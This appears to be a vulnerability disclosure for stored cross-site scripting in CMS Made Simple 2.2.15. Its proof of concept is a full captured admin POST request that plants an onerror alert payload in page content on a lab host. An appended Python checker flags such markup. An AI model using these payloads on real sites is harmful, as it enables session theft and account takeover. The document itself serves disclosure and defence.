Summary:
Stored Cross-Site Scripting - CMS Made Simple 2.2.15
Detailed Description:
# Description
A user with permission to edit content (the Editor or Designer role) can save page content with embedded JavaScript. When any user views that page, the JavaScript executes in their browser.
# PoC
## Step 1: Go to Content Manager and edit content
## Step 2: Modify content_en with payload "<img src = x onerror = alert(origin)>" and submit
```http
POST /cmsms/admin/moduleinterface.php HTTP/1.1
Host: web-lab.pwn
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:81.0) Gecko/20100101 Firefox/81.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://web-lab.pwn/
Content-Type: multipart/form-data; boundary=---------------------------72093799622205927352514468929
Content-Length: 4525
Origin: http://web-lab.pwn
Connection: close
Cookie: e65594eeb39b9b448034fc3eee48fc815463b91a=9b293e574967f5dc78abea9174d5f4caf5159e14%3A%3AeyJ1aWQiOjMsInVzZXJuYW1lIjoiZWRpdG9yIiwiZWZmX3VpZCI6bnVsbCwiZWZmX3VzZXJuYW1lIjpudWxsLCJoYXNoIjoiJDJ5JDEwJExFM1NKTHF5bDR3emh2cHNcLzgxTVIuVUk4bU9tcEZNekJwUkU4dzc5Z1NlS3c0UGtqbExycSJ9; __c=1a2e1c5b9a471aa9e58; fusionl9731_visited=yes; CMSSESSIDac0680acaa0f=al5kq5mhtivpdjlchcutj7g1eo
Upgrade-Insecure-Requests: 1

-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="mact"

CMSContentManager,m1_,admin_editcontent,0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="__c"

1a2e1c5b9a471aa9e58
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="m1_content_id"

35
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="m1_active_tab"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="m1_content_type"

content
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="title"

Demo
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="content_en"

<p>demo<img src="x" onerror=alert(origin) /></p>
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="menutext"

Demo
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="parent_id"

-1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="showinmenu"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="showinmenu"

1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="titleattribute"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="accesskey"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="tabindex"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="target"

---
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="metadata"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="pagedata"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="design_id"

2
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="template_id"

10
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="alias"

demo
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="active"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="active"

1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="secure"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="cachable"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="cachable"

1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="image"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="thumbnail"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="extra1"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="extra2"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="extra3"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="wantschildren"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="wantschildren"

1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="searchable"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="searchable"

1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="disable_wysiwyg"

0
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="ownerid"

1
-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="additional_editors"


-----------------------------72093799622205927352514468929
Content-Disposition: form-data; name="m1_submit"

Submit
-----------------------------72093799622205927352514468929--
```
## Step 3: Go to the page and trigger the payload
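As an added, defender-side example that is not part of the original report: a Python check that parses a multipart submission of the form shown above, pulls out the content_en field and flags markup that executes script when the page renders (event-handler attributes, script/iframe/object/embed elements, javascript: URLs). The sample body is constructed from the request above; the function and class names are assumptions.

```python
import re
from html.parser import HTMLParser

# Constructed sample (not from the report): the two relevant parts of the body above.
BOUNDARY = "---------------------------72093799622205927352514468929"
SAMPLE_BODY = (
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="title"\r\n\r\nDemo\r\n'
    f"--{BOUNDARY}\r\n"
    'Content-Disposition: form-data; name="content_en"\r\n\r\n'
    '<p>demo<img src="x" onerror=alert(origin) /></p>\r\n'
    f"--{BOUNDARY}--\r\n"
)

def parse_multipart(body: str, boundary: str) -> dict:
    """Map field name -> value for the text parts of a multipart/form-data body."""
    fields = {}
    for part in body.split(f"--{boundary}"):
        part = part.strip("\r\n")
        if not part or part == "--":  # preamble, or the closing delimiter
            continue
        headers, _, value = part.partition("\r\n\r\n")
        name = re.search(r'name="([^"]*)"', headers)
        if name:
            fields[name.group(1)] = value
    return fields

class ActiveContentFinder(HTMLParser):
    """Records markup that runs script when a browser renders the page."""
    def __init__(self):
        super().__init__()
        self.findings = []
    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe", "object", "embed"):
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            if name.startswith("on"):  # onerror, onload, onclick, ...
                self.findings.append(f"<{tag} {name}> event handler")
            elif name in ("href", "src", "action") and value and \
                    value.strip().lower().startswith("javascript:"):
                self.findings.append(f"<{tag} {name}> javascript: URL")

def find_active_content(html: str) -> list:
    finder = ActiveContentFinder()
    finder.feed(html)
    finder.close()
    return finder.findings

def check_submission(body: str, boundary: str, field: str = "content_en") -> list:
    return find_active_content(parse_multipart(body, boundary).get(field, ""))
```

A check like this is a screening aid for stored content or captured submissions; the fix itself is server-side sanitization of content_en against an element and attribute allowlist before it is saved or rendered.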